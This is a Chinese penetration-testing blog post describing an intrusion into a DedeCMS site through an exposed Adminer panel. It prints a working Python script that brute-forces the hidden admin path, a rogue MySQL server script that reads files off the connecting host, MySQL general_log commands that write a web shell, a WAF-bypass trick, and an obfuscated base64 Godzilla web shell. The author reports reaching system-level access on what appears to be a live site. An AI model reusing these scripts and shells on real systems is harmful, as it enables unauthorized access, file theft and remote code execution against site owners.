欢迎来到【血梦博客】 今天是:2020年10月25日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> 记一次偶遇Adminer

记一次偶遇Adminer

作者:血梦 日期:2020-10-05 浏览:158分类: 渗透测试 已提交百度收录

又是无聊的一天打开高危扫描器开扫,结果啥也没扫出来,然后就开始苦逼的一个一个站看了。然后发现下面这个站dedecms,服务器windows各种历史洞打了一遍都没用,因为是windows可以用这个跑下后台

import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = "" flag = 0 url = "http://www.test.com/tags.php" data = { "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif", "_FILES[mochazz][name]" : 0, "_FILES[mochazz][size]" : 0, "_FILES[mochazz][type]" : "image/gif" } for num in range(1,7): if flag: break for pre in itertools.permutations(characters,num): pre = ''.join(list(pre)) data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre) print("testing",pre) r = requests.post(url,data=data) if "Upload filetype not allow !" not in r.text and r.status_code == 200: flag = 1 back_dir = pre data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" print("[+] 前缀为:",back_dir) flag = 0 for i in range(30): if flag: break for ch in characters: if ch == characters[-1]: flag = 1 break data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch) r = requests.post(url, data=data) if "Upload filetype not allow !" not in r.text and r.status_code == 200: back_dir += ch print("[+] ",back_dir) data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" print("后台地址为:",back_dir) 

结果跑完居然是dede,这就扯了我访问dede是404.如果找到后台的话还可以用这个洞猜一下管理员账号:
http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
山穷水尽了随手试了一下adminer.php居然存在(扫描器里有adminer.php的估计扫的目录太多了被封ip了所以不要相信扫描器)
adminer低版本可以利用mysql服务端恶意读取客户端文件
mysql_client.py代码

#coding=utf-8  import socket import logging import sys logging.basicConfig(level=logging.DEBUG) filename=sys.argv[1] sv=socket.socket() sv.setsockopt(1,2,1) sv.bind(("",3306)) sv.listen(5) conn,address=sv.accept() logging.info('Conn from: %r', address) conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00") conn.recv(9999) logging.info("auth okay") conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00") conn.recv(9999) logging.info("want file...") wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename conn.sendall(wantfile) content=conn.recv(9999) logging.info(content) conn.close() 

使用方法直接服务器执行
python mysql_client.py "F:\dede\index.php"
然后adminer填你服务器地址,账号密码随便填连接就读到了文件,服务器3306端口要对外开放
然后就是又开始读文件了,先随意读一下,让它报出web路径来因为是dedecms所以直接读 data\common.inc.php文件不存在?直接放F盘下读一下发现账号为root,直接登录adminer.php通过日志getshellset global general_log=on 开启general log模式set global general_log_file='F:\\*****\\shell.php'; 设置日志路径select '<?php eval($_POST['pwd']);?>'; 写shell毫无疑问最后这里被拦了,抓个包来测吧,select '<?php '不拦select+'<?php+phpinfo();+?>'拦掉使用注释换行绕过select+'<?php+//%0Aphpinfo();+?>'写个哥斯拉的马

select '<?php //"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));//"; ?>' 

成功连上,system

点击收藏 1关注 | 2

关灯